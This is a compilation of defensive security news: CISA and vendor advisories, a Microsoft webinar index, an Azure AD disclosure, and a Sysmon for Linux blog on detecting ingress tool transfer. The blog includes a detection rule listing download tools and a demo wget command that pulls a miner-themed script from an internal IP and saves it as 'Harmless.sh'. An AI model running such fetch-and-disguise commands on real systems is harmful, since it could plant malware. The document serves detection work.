CISA and FBI Release Alert on Active Exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus

 Original
release date: December 2, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity
Advisory
 identifying active exploitation of a vulnerability—CVE-2021-44077—in
Zoho ManageEngine ServiceDesk Plus. CVE-2021-44077 is an unauthenticated remote
code execution vulnerability that affects all ServiceDesk Plus versions up to,
and including, version 11305. 

This vulnerability was addressed by the update released by Zoho on September
16, 2021 for ServiceDesk Plus versions 11306 and above. If left unpatched,
successful exploitation of the vulnerability allows an attacker to upload
executable files and place webshells that enable post-exploitation activities,
such as compromising administrator credentials, conducting lateral movement,
and exfiltrating registry hives and Active Directory files. Zoho has set up a
security response plan center
 that provides additional details, a
downloadable tool that can be run on potentially affected systems, and a
remediation guide.

CISA encourages organizations to review the joint Cybersecurity
Advisory
 and apply the recommended mitigations immediately.

Drupal Releases Security Updates

 Drupal has released security updates to address vulnerabilities that could
affect versions 8.9, 9.1, and 9.2. An attacker could exploit these
vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review Drupal Security Advisory SA-CORE-2021-011 and apply
the necessary updates.

Microsoft Recordings | Security Community Webinars

 

AZURE COMPUTE

2021

Feb 3

Confidential computing nodes on Azure Kubernetes
Service

YouTube

Deck

AZURE NETWORK SECURITY

2021

 May 20

Using Attack Simulation to Assess Protection and
Detection Capabilities of Azure WAF

 YouTube

 Deck

 May 11

Central DNS Management and Logging with Azure Firewall 

YouTube

 Deck

May 6

Exploring IDPS Capability in Azure Firewall Premium

YouTube

Deck

May 4

Using Azure WAF Policies to Protect Your Web
Application at Different Association Levels

YouTube

Deck

Apr 27

Safeguards for a Successful Azure DDoS Protection
Standard Deployment

YouTube

Deck

Apr 6

Content Inspection Using TLS Termination with Azure
Firewall Premium

YouTube

Deck

2020

 Dec 10

Azure Network Security Advanced Architecture

YouTube 

 Deck

 Dec 8

Azure Network Security for SOCs 

YouTube

 Deck

Dec 3

Getting started with Azure Firewall Manager

YouTube

Deck

Dec 1

Manage application and network connectivity with Azure Firewall

YouTube

Deck

Nov 12

Boosting your Azure Web Application (WAF) deployment

YouTube

Deck

Nov 10

Getting started with Azure Distributed Denial of Service (DDoS) Protection

YouTube

Deck

Oct 27

Protecting your web apps with Azure Web Application Firewall (WAF)

YouTube

Deck

Oct 15

Introduction to Azure Network Security

YouTube

Deck

AZURE PURVIEW

2021

 Jul 29

Discover Multi Cloud Data in Purview

 YouTube

 Deck

 Jun 17

 Better Together: E2E Sensitivity Label Flow from M365 to Azure
Purview to SQL to Power BI

 YouTube

Deck 

Jan 27

Introduction to Azure Purview

YouTube

Deck

MICROSOFT
365 DEFENDER

2021

 Oct 11

 l33tSpeak: Advanced Hunting in Microsoft 365 Defender

 YouTube

 Demo

 Sep 15

Webinar Series: Monthly Threat Insights

YouTube

Deck 

Aug 18

Webinar Series: Monthly Threat Insights

YouTube

Deck

Jul 29

Introduction to Microsoft Defender Application Guard for Office

YouTube

 Deck

Jul 21

Webinar series: Monthly Threat Insights

YouTube

Deck

Jul 12

The story behind eSentire MDR with Microsoft 365 Defender: How eSentire
streamlined security for itself and its customers

YouTube

Deck

Jun 16

Webinar series: Monthly Threat Insights

YouTube

Deck

May 10

l33tSpeak: Advanced Hunting in Microsoft 365 Defender

YouTube

GitHub

May 3

Microsoft 365 Defender’s Unified Experience for XDR

YouTube

Deck

Feb 22

What Tracking an Attacker Email Infrastructure Tells Us About Persistent
Cybercriminal Operations

YouTube

Deck

Jan 28

Protect, Detect, and Respond to Solorigate using Microsoft 365 Defender

YouTube

Deck

2020

Nov 17

l33tSpeak | Advanced hunting in Microsoft 365 Defender

YouTube

Demo

Aug 5

Advanced Hunting series – Episode 4: Let’s hunt! Applying KQL to
incident tracking

YouTube

Demo

Jul 29

Advanced Hunting series – Episode 3: Summarizing, Pivoting, and
Visualizing Data

YouTube

Demo

Jul 22

Advanced Hunting series – Tracking the Adversary Episode 2: Joins

YouTube

Demo

Jul 15

Advanced Hunting series – Tracking the Adversary Episode 1: KQL
Fundamentals

YouTube

Demo

MICROSOFT
DEFENDER FOR CLOUD

(formerly
Azure Security Center)

2021

Nov 17

NextGen Multi Cloud CSPM in Microsoft Defender for
Cloud

YouTube

Deck

Nov 16

Azure
Security Ignite 2021 Updates

YouTube

Deck

Oct 27

Azure Defender for SQL

YouTube

Deck

Oct 26

Manage Your Security Risk and Compliance Requirements with Azure Security
Center

YouTube

Deck

Oct 20

What’s New in the Last 6 Months

YouTube

Deck

Oct 5

Better Together: Azure Defender, Azure Sentinel, and M365 Defender

YouTube

Deck

Aug 26

Better Together | Azure Security Center and Microsoft Defender for
Endpoint

YouTube

Deck

Jul 22 

 

Manejo
de Postura de Seguridad de la Nube y Protección de Cargas de Trabajo (Cloud
Security Posture Management and Workload Protection)

YouTube

 

Deck

 

May 13 

 

Azure
Workbooks in Security Center

 YouTube

Deck

 Apr 29

 Demystifying
Azure Defender Once for All

 YouTube

 Deck

 Apr 28

 

Automate(d)
Security with Azure Security Center and Logic Apps

 YouTube

 Deck

Mar 9 

 

Azure
Defender for Storage

 YouTube

 Deck

 Feb 23

 Best Practices for Improving Your Secure Score

 YouTube

 Deck

Jan 7 

Azure service layers protection 

 YouTube

 Deck

 2020

Dec 7

Investigating Azure Security Center alerts using
Azure Sentinel

YouTube

Deck

Nov 30

Azure Defender for SQL Anywhere

YouTube

Deck

Nov 9

Ignite 2020 Announcements

YouTube

Deck

Nov 2

Enhance IoT Security & Visibility with Azure Defender and Azure
Sentinel 

YouTube

Deck

Oct 28

Multi-Cloud support in Azure Security Center

YouTube

Deck

Oct 26

VM Protection

YouTube

Deck

Mar 11

Security Benchmark Policy

YouTube

Deck

Feb 20

Secure Score enhanced model

YouTube

Deck

 MICROSOFT DEFENDER FOR CLOUD APPS

(formerly
Microsoft Cloud App Security)

 2021

 Aug 17

Protect your Slack Deployment using Microsoft Cloud
App Security

YouTube

Deck

Jun 8

Protect Your Salesforce Environment Using MCAS

YouTube

Deck

May 25

Improve Your AWS Security Posture Using MCAS

YouTube

Deck

May 12

Protect Your Box Deployment Using MCAS

YouTube

Deck

May 11

How to Protect Your GitHub Environment Using MCAS

YouTube

Deck

 2020

Apr 15

Enabling Secure Remote Work

YouTube

Deck

MICROSOFT DEFENDER FOR ENDPOINT

2021

May 18

Stopping Cabanak+FIN7: Understanding the MITRE
Engenuity ATT&CK Results

YouTube

Deck

2020

Sep 16

Get started with Microsoft Defender ATP: from zero to
hero

YouTube

Deck

Jul 7

Deploy MDATP capabilities using a phased roadmap

YouTube

Deck

Apr 2

End-to-end security for your endpoints

YouTube

Deck

MICROSOFT DEFENDER FOR IDENTITY

2021

Oct 6

Microsoft Defender for Identity’s Latest Detection
Capabilities

YouTube

Deck

Jun 22

MDI in the Microsoft 365 Security Center

YouTube

Deck

Jun 1

Detection Deep Dive with Defender for Identity’s
Engineering Experts

YouTube

Deck

Mar 23

Proactive Identity Posture Management

YouTube

Deck

MICROSOFT DEFENDER FOR IoT

(formerly Azure Defender for IoT)

2021

Oct 19

Agent Based Solution for IoT Device

YouTube

Deck

Jan 20

Leveraging OT Behavioral Analytics and Zero Trust for
OT Cyber Resilience

YouTube

Deck

2020

Sep 17

MITRE ATT&CK for ICS: CyberX Demo and Azure
IoT/OT Security Deep Dive

YouTube

Deck

MICROSOFT SENTINEL

(formerly Azure Sentinel)

2021

Nov 16

Create
Your Own Microsoft Sentinel Solutions

YouTube

Deck

Nov 15

Improving
the Breadth and Coverage of Threat Hunting with ADX Support, More Entity
Types, and Updated MITRE Integration

YouTube

Deck

Nov 10

Decrease Your SOC’s MTTR (Mean Time to Respond) by
Integrating Microsoft Sentinel with Microsoft Teams

YouTube

Deck

Nov 9

SAP
Mini-Series Part 2
: Deep Dive – End-to-End Installation of
SAP for Microsoft Sentinel

YouTube

Deck

Nov 8

Latest Innovations for Microsoft’s Cloud Native SIEM

YouTube

Deck

Oct 28

What’s New in Azure Sentinel Automation

YouTube

Deck

Oct 25

Explore the Power of Threat Intelligence in Azure
Sentinel

YouTube

Deck

Oct 18

SAP
Mini-Series Part 1
: Introduction to Monitoring SAP with Azure
Sentinel for Security Professionals

YouTube

Deck

Oct 11

Become a Notebooks Ninja – Getting Started with
Jupyter Notebooks in Azure Sentinel

YouTube

Deck

Oct 6

Turbocharging ASIM: Making Sure Normalization Helps
Performance

Rather Than Impacting It

YouTube

Deck*

Sep 29

Better Together | OT and IoT Attack Detection,
Investigation and Response

YouTube

Deck

Sep 15

What’s New in the Last 6 Months

YouTube

Deck

Sep 14

Learn About Customizable Anomalies and How to Use
Them

YouTube

Deck

Aug 18

Fusion ML Detections with Scheduled Analytics Rules

YouTube

Deck

Aug 11

Deep Dive into Azure Sentinel Normalizing Parsers and
Normalized Content

YouTube

Deck

Jul 28

The Information Model: Understanding Normalization in
Azure Sentinel

YouTube

Deck

Jul 20

Streamlining your SOC Workflow with Automated
Notebooks

YouTube

Deck

Jul 13

Customizing Azure Sentinel with Python – MSTICPy and
Jupyter Notebooks

YouTube

Deck

Jun 29

Threat Intelligence in Action with Anomali

YouTube

Deck

Jun 24

Cost Management in Azure Sentinel – Getting the Most
for Your Investment

YouTube

Deck

May 26

Deep Dive into Azure Sentinel Innovations for RSA
2021

YouTube

Deck

Mar 31

Using Azure Data Explorer as Your Long Term Retention
Platform of Azure Sentinel Logs

YouTube

Deck

Mar 18

Data Collection Scenarios

YouTube

Deck

Feb 18

Best Practices for Converting Detection Rules from
Splunk, QRadar, and ArcSight to Azure Sentinel Rules

YouTube

Deck

Feb 4

Accelerate Your Azure Sentinel Deployment with the
All-in-One Accelerator

YouTube 

Deck

Jan 21

Auditing and monitoring your Azure Sentinel workspace

YouTube

Deck

Jan 19

Azure Notebooks Fundamentals – How to get started

YouTube

Deck

Jan 12

Machine Learning detections in the AI-infused Azure
Sentinel SIEM

YouTube

Deck

2020

 Sep 30

Unleash your Azure Sentinel automation Jedi tricks
and build Logic Apps Playbooks like a Boss

YouTube

Deck

 Sep 29

Enabling User and Entity Behavior Analytics (UEBA) |
Hunting for Insider Threats

YouTube

Deck

 Sep 14

Empowering the Azure Sentinel Community with
Pre-Recorded Datasets for research and training purposes

YouTube

Deck

 Sep 9

KQL
part 3 of 3 – 
Optimizing Azure Sentinel KQL queries
performance

YouTube

Deck

Sep 2

Log Forwarder deep dive | Filtering CEF and Syslog
events

YouTube

Deck

Aug 19

Threat intelligence automation with RiskIQ

YouTube

Deck

Aug 12

Threat hunting and reduce dwell times with Azure
Sentinel

YouTube

Deck

Jul 28

KQL
part 2 of 3:
 KQL hands-on lab exercises

YouTube

*Deck

Jul 9

Workbooks deep dive – Visualize your security threats
and hunts

YouTube

Deck

Jun 23

Multi-tenant investigations

YouTube

Deck

Jun 15

Deploying and Managing Azure Sentinel as Code

YouTube

Deck

Jun 2

KQL
part 1 of 3:
 Learn the KQL you need for Azure Sentinel

YouTube

*Deck

May 13

Using Sigma to accelerate your SIEM transformation to
Azure Sentinel

YouTube

Deck

Apr 22

Threat Hunting on AWS using Sentinel

YouTube

Deck

Apr 20

MSSP and Distributed Organization Support

YouTube

Deck

Mar 31

Extending and Integrating Azure Sentinel (APIs)

YouTube

*Deck

Mar 18

Deep Dive on Threat Intelligence

YouTube

Deck

Mar 4

Recap of RSA 2020

YouTube

Deck

Feb 19

Tackling Identity

YouTube

*Deck

Feb 12

Deep Dive on Correlation Rules

YouTube

*Deck

Jan 29

Threat Hunting – revisited

YouTube

Deck

Jan 22

End-to-End SOC scenario

YouTube

Deck

MICROSOFT MISCELLANEOUS
SECURITY 
WEBINARS

CYBERSECURITY FUNDAMENTALS

2021

Oct 21

Hacking
AI with Counterfit

YouTube

Deck

Oct 14

Exploiting
Vulnerabilities in Azure Stack Hub
(Note:
All exploits discussed during the webinar have been addressed.)

YouTube

Deck

Oct 7

Combating Manipulated
Media -Media Provenance

YouTube

Deck

Jul 1

Spa
Treatments: Web Security in Single Page Applications

YouTube

Deck

Jun 15

Best
Practices of Authentication & Authorization Methods

YouTube

Deck

Mar 24

Who
Wants a Thousand Free Puppies? Managing Open Source Software Security in The
Enterprise

YouTube

Deck

Feb 16

The
Billion-Dollar Central Bank Heist

YouTube

Deck

2020

Dec 9

Microsoft
Digital Defense Report

YouTube

Deck

Oct 29

Cybersecurity
Basics: Securing Yourself

YouTube

Deck

DIVERSITY IN CYBERSECURITY 

2021

Oct 4

Mekonnen Kassa: From a Refugee to Microsoft: Impact
of Active Allyship

YouTube

Deck

May 27

Sarah Young: How Unconventional Career Paths are
Making a Difference in the Technology

YouTube

Deck

Mar 16

Sue Loh, software engineer at Microsoft and author of
the young adult hacker novel Raven,
inspires girls and other under-represented groups to enter tech. 

YouTube

Deck

 

MITRE ATT&CK technique coverage with Sysmon for Linux

 Thanks to Kevin
Sheldrake, Roberto Rodriguez, Jessen Kurien and Ofer Shezaf for making this
blog possible.

 

For many years, people have been using Sysmon on their Windows systems to gain clarity on what is
happening on their machines and, for the security community, to highlight when
suspicious or malicious activity occurs. Collecting events from individual
hosts is crucial to ensuring you have the visibility needed to identify and
respond to malicious events and Sysmon provides a way to do just that. With the
introduction of Sysmon for Linux, that same clarity is available for many Linux
distros.  While we won’t be detailing all the available Sysmon for Linux
capabilities in this post, you can find the Sysmon documentation here,
read about how to deploy Sysmon in conjunction with Azure Sentinel, look at a
quick guide on how you can use Sysmon in conjunction with Azure Sentinel, or look through
our GitHub repository where we’ve been experimenting with Sysmon configs for Linux.

 

To frame the conversation around how Sysmon for Linux (shortened to Sysmon
from here on out) can be used to create clarity for security teams, we will
walk through how Sysmon events can be used to spot a specific MITRE ATT&CK
technique. The MITRE ATT&CK Matrix (Linux
focused version here
) is a well-known and respected framework that many
organizations use to think about adversary techniques and assess detection
coverage. Just like on the Windows side, Sysmon can be used to highlight
tactics and techniques across the matrix. In this blog, we will focus in on the
Ingress Tool Transfer technique (ID T1105)
and highlight a couple of the Sysmon events that can be used to see it. We
observe this technique being used against Linux systems and sensor networks
regularly, and while we have tools to alert on this activity, it is still a
good idea to ensure you have visibility into the host so you can investigate
attacks. To look at this technique, we will show how to enable collection of
three useful events, what those events look like when they fire, and how they
can help you understand what happened. Additionally, we will show what those
events look like in Azure Sentinel.

 

Ingress Tool
Transfer (T1105)

It is common to see attackers taking advantage of initial access to a
machine by downloading a script or piece of malware. While “living off the
land” is still something to watch for, in attacks on our customers and against
our sensor network we see attempts to download tools very frequently.  In
fact, the MITRE ATT&CK page for Ingress Tool
Transfer
shows 290 different pieces of malware and activity groups that use
this technique, so it is a good place to start showing how Sysmon can help add
coverage to different ATT&CK techniques.

 

For this example, we will focus on the five most commonly used tools for
downloading scripts and malware that we’ve seen run on our sensor networks. We
will look for wget, curl, ftpget, tftp, and lwp-download. You may want to
customize this list for your environment, but this will cover the majority of
what we see.

 

Create your Sysmon
configuration file

Just like Sysmon for Windows, you will want to create configuration files
based on the system you are wanting to collect logs for based on the role of
the system, your environment, and your collection requirements. The basics of
how to write and run a configuration can be found on the Sysmon documentation page and you can see some examples in
the MSTIC-Sysmon
repo
so we’ll just focus on what we need for this specific technique. One
thing to note is that the Event IDs are consistent between Windows and Linux so
Event ID 1 represents process creation events in both environments.

 

We are interested in seeing when an attacker tries to download files to our
computer. There are a few ways we can see that behavior reflected. To begin, we
know that a process will have to get created to start the download. We also
know that a network connection will have to be made and, if the attacker is
successful, a file will be written. Lucky for us, Sysmon has us covered for all
three of these with ProcessCreate, NetworkConnect, and FileCreate events.

 

Below is a basic configuration that we can use to create those events based
on our list of the commonly used tools (it is available in our repo here). You can see we have
separate sections for each of the events we want and have said we want to
include the listed matches.  The tool name will be in the “Image” field,
and we’ve used “end with” because we generally expect to see file paths there
(ex. /bin/wget).

 

<!–
Created: 10/15/2021 Modified: 10/17/2021 Technique: Ingress Tool Transfer
References: – https://attack.mitre.org/techniques/T1105/
–> <Sysmon schemaversion=”4.81″> <EventFiltering>
<RuleGroup name=”” groupRelation=”or”>
<ProcessCreate onmatch=”include”> <Rule name=”TechniqueID=T1105,TechniqueName=Ingress
Tool Transfer” groupRelation=”or”> <Image
condition=”end with”>wget</Image> <Image
condition=”end with”>curl</Image> <Image
condition=”end with”>ftpget</Image> <Image
condition=”end with”>tftp</Image> <Image
condition=”end with”>lwp-download</Image> </Rule>
</ProcessCreate> </RuleGroup> <RuleGroup name=””
groupRelation=”or”> <NetworkConnect
onmatch=”include”> <Rule name=”TechniqueID=T1105,TechniqueName=Ingress
Tool Transfer” groupRelation=”or”> <Image
condition=”end with”>wget</Image> <Image
condition=”end with”>curl</Image> <Image
condition=”end with”>ftpget</Image> <Image
condition=”end with”>tftp</Image> <Image
condition=”end with”>lwp-download</Image> </Rule>
</NetworkConnect> </RuleGroup> <RuleGroup name=””
groupRelation=”or”> <FileCreate onmatch=”include”>
<Rule name=”TechniqueID=T1105,TechniqueName=Ingress Tool Transfer”
groupRelation=”or”> <Image condition=”end
with”>wget</Image> <Image condition=”end
with”>curl</Image> <Image condition=”end
with”>ftpget</Image> <Image condition=”end
with”>tftp</Image> <Image condition=”end
with”>lwp-download</Image> </Rule> </FileCreate>
</RuleGroup> </EventFiltering> </Sysmon>

 

One thing to note is that both ProcessCreate and ProcessTerminate are
enabled by default.  If you don’t want to collect one of those, you’ll
need an empty “include” statement. Once you have your configuration
created and enabled, you’ll start seeing events.

 

Raw Sysmon events

The Sysmon logs can be found in /var/log/syslog.
While you could just look at the raw events there, we have the SysmonLogView
tool which can make it easier. This tool will take the Sysmon events and
display them in the more human readable format that you can see below. You can
use the below command to push new events from syslog into the sysmonLogView
using the following command:

 

sudo tail -f
/var/log/syslog | sudo /opt/sysmon/sysmonLogView

 

This gives us a running view of what events are being created. We can then
run the below command to trigger the rules.

wget
10.0.5.8:7000/xmrigAttackDemo.sh -O Harmless.sh

This command will use wget to call out to a server at 10.0.5.8 port 7000,
download the xmrigAttackDemo.sh script, and save it as the script Harmless.sh.
xmrigAttackDemo.sh is an internal testing script that I used for this demo.

 

ProcessCreate
(Event ID 1):

You can see we get quite a lot of information from the ProcessCreate event.
We can see wget in the Image field, the full Command Line, the Current
Directory, and the user. You also get Parent Process information although it
isn’t as interesting in this example.

 

Event
SYSMONEVENT_CREATE_PROCESS RuleName: – UtcTime: 2021-09-28 21:53:22.533
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image:
/usr/bin/wget FileVersion: – Description: – Product: – Company: –
OriginalFileName: – CommandLine: wget 10.0.5.8:7000/xmrigAttackDemo.sh -O
Harmless.sh CurrentDirectory: /home/testUser User: testUser LogonGuid:
{23b1b3a6-0000-0000-e903-000000000000} LogonId: 1001 TerminalSessionId: 38
IntegrityLevel: no level Hashes: – ParentProcessGuid:
{23b1b3a6-8ed2-6153-0824-7cafd1550000} ParentProcessId: 13408 ParentImage:
/bin/bash ParentCommandLine: bash

 

NetworkConnect
(Event ID 3):

In the NetworkConnect event, we again see wget in the Image field and the
user. We also see the protocol, source and destination IP addresses, and the
ports involved. Our example command line has the IP listed already so it isn’t
new information, but it could be useful in tying the different logs together.
You’ll notice the Process IDs also match up as expected.

 

Event
SYSMONEVENT_NETWORK_CONNECT RuleName: – UtcTime: 2021-09-28 21:53:22.543
ProcessGuid: {23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image:
/usr/bin/wget User: testUser Protocol: tcp Initiated: true SourceIsIpv6: false
SourceIp: 10.0.5.10 SourceHostname: – SourcePort: 40680 SourcePortName: –
DestinationIsIpv6: false DestinationIp: 10.0.5.8 DestinationHostname: –
DestinationPort: 7000 DestinationPortName: –

 

FileCreate (Event
ID 11):

Here we can again see the wget tool and the process Id. We also have the
name of the file that was created and its file path.

 

Event
SYSMONEVENT_FILE_CREATE RuleName: – UtcTime: 2021-09-28 21:53:22.536 ProcessGuid:
{23b1b3a6-8ed2-6153-705c-4f4576550000} ProcessId: 13409 Image: /usr/bin/wget
TargetFilename: /home/testUser/Harmless.sh CreationUtcTime: 2021-09-28
21:53:22.536

 

Viewing in Azure
Sentinel

Sysmon events are pushed to Syslog so if you are collecting Syslog events
from your Linux machine into Azure Sentinel, you will get the Sysmon
events.  For more details on how to make that connection, check out the
documentation here.  Also, as the Sysmon events come through with
most of the data in the Syslog Message field, you’ll need to parse out the
fields you are interested in.  Fortunately, the Azure Sentinel Information Model parsers have you covered.
You can install the Parsers from the link here. Once you do, you’ll have access to functions that
have taken the guesswork out of parsing.

 

The parsing functions are available under Functions-> Workspace
functions. In the below, you can see the Linux Sysmon functions we currently
have.

russmc_7-1634581968271.png

 

Using the function vimProcessCreateLinuxSysmon, we can see our event reflected.
We have narrowed the query to just the event in the example above and chosen to
project only a couple of the columns of data.

russmc_0-1634586546027.png

From here you can start to include Sysmon as a data source for your hunting
queries and analytics.

 

Sysmon for Linux
and MITRE ATT&CK

While we didn’t dig into all the possible Sysmon events or ATT&CK
techniques, hopefully you can see how you can use Sysmon to collect data that
will highlight adversary techniques. Sysmon

is open source and available in the Sysinternals GitHub.  If you have requests or find
bugs, check out the Sysmon for Linux project page for the best ways to contact
the team. MSTIC has been working with different configs and have started a repo here
to share with the community. If you want to see other configs based on MITRE
ATT&CK techniques, check them out here and feel free to add suggestions of your own. If you
want a config that has all the techniques we’ve mapped so far, you can find it here. We will continue to come up with new ways to utilize
the logs in Azure Sentinel and we look forward to seeing what the community
develops. If the amazing work around the Windows version is any indication, we
expect that the future of Linux logging is bright.

 

References:



Original  Post here

Security Advisory for BIND

 ISC
Releases Security Advisory for BIND

10/28/2021 12:05 PM EDT

 

Original
release date: October 28, 2021

The Internet Systems Consortium (ISC) has released a security advisory that
addresses a vulnerability affecting multiple versions of the ISC Berkeley
Internet Name Domain (BIND). A remote attacker could exploit this vulnerability
to cause a denial-of-service condition.

CISA encourages users and administrators to review the ISC advisory
for CVE-2021-25219 and
apply the necessary updates or workaround.

Compromised a JavaScript NPM

 Hackers have compromised a JavaScript NPM library with password-stealing
malware. The library, UAParser.js, garners 6 million downloads a week. The
threat came after hackers hijacked UAParser.js’s NPM account. GitHub has warned
users that any device with the package installed should be considered
compromised

Microsoft Information Protection (MIP) Ninja Training is Here

 We are very excited and pleased to announce this rendition of the Ninja Training Series. With all the other training out there, our team has been working diligently to get this content out there. There are several videos and resources out there and the overall purpose of the MIP Ninja training is to help you master this realm. We aim to get you up-to-date links to the community blogs, training videos, Interactive Guides, learning paths, and any other relevant documentation. 

 

To make it easier for you to start and advance your knowledge gradually without throwing you in deep waters, we split content in each offering into three levels: beginner, intermediate, and advanced.  

 

In addition, after each section, there will be a knowledge check based on the training material you’d have just finished! Since there’s a lot of content, the goal of these knowledge checks is to help you determine if you were able to get a few of the major key takeaways.  

 

There’ll be a fun certificate issued at the end of the training: Disclaimer: This is NOT an official Microsoft certification and only acts as a way of recognizing your participation in this training content. 

 

Lastly, this training will be updated on a quarterly basis to ensure you all have the latest and greatest material! 


Go here

 

Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

 Please Submit Comments –
Draft Baseline Criteria for Consumer Software Cybersecurity Labeling

Section 4s
of the President’s Executive Order (EO) on “Improving the Nation’s Cybersecurity (14028),” issued
on May 12, 2021, charges NIST, in coordination with the Federal
Trade Commission (FTC) and other agencies, to initiate pilot programs for
cybersecurity labeling. These labeling programs are intended to educate the
public on the security capabilities of software development practices.

To inform this effort, Sec. 4 (u)
of the EO directs NIST to “…identify secure software development practices or
criteria for a consumer software labeling program.” Furthermore, the identified
criteria “…shall reflect a baseline level of security practices, and if
practicable, shall reflect increasingly comprehensive levels of testing and
assessment that a product may have undergone.” Sec. 4 (u)
also states that “…NIST shall examine all relevant information, labeling, and
incentive programs, employ best practices, and identify, modify, or develop a
recommended label or, if practicable, a tiered software security rating system.
This review shall focus on ease of use for consumers and a determination of
what measures can be taken to maximize participation.”

Today, NIST has released for public comment a document that
advances these tasks: Draft Baseline Criteria for Consumer Software Cybersecurity Labeling.
This draft document addresses the need to develop appropriate cybersecurity
criteria for consumer software—and it informs the development and use of a
label for consumer software which will improve consumers’ awareness,
information, and ability to make purchasing decisions (while taking
cybersecurity considerations into account). This document was developed after
much input from a recent NIST workshop, position papers submitted to NIST,
additional extensive research, and many discussions with experts and
organizations from the public and private sectors.

We are seeking comments on all aspects of the criteria contained
in the draft document (more
details can be found in the ‘note to reviewers’ section of the draft document).
In accordance with the EO, NIST plans to produce a final version of
these criteria by February 6, 2022.

Please view the draft document HERE.

To submit comments, please email them to labeling-eo@nist.gov using
the subject, “Draft Consumer Software Labeling Criteria,” by December
16, 2021.

Azure Active Directory (AD) keyCredential property Information Disclosure

 Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.
The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.
As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

Product/Service Microsoft’s Mitigation Customer impact assessment and remediation
Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action. Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately customers who bring their own certificates could be affected. This is regardless of the renewal date of the certificate.
To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo
In addition, Azure Automation supports Managed Identities Support (GA announced on October 2021). Migrating to Managed Identities from Run-As will mitigate this issue. Please follow the guidance here to migrate.
Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints. Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications.
Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action
Azure Migrate appliances registered prior to 11/02/2021 and/or appliances registered after 11/02/2021 where auto-update was disabled could be affected by this issue.
To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.
Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints. Azure Site Recovery deployed an update to prevent private keydata from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action Customers who have deployed and registered the preview version of VMware to Azure DR experience with ASR before 11/01/2021 could be affected.
To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link.
Azure AD applications and Service Principals [1] Microsoft has blocked reading private key data as of 10/30/2021. Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

  • Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
  • If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
  • Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
  • Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
  • For more information refer to the security operations guidance.

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.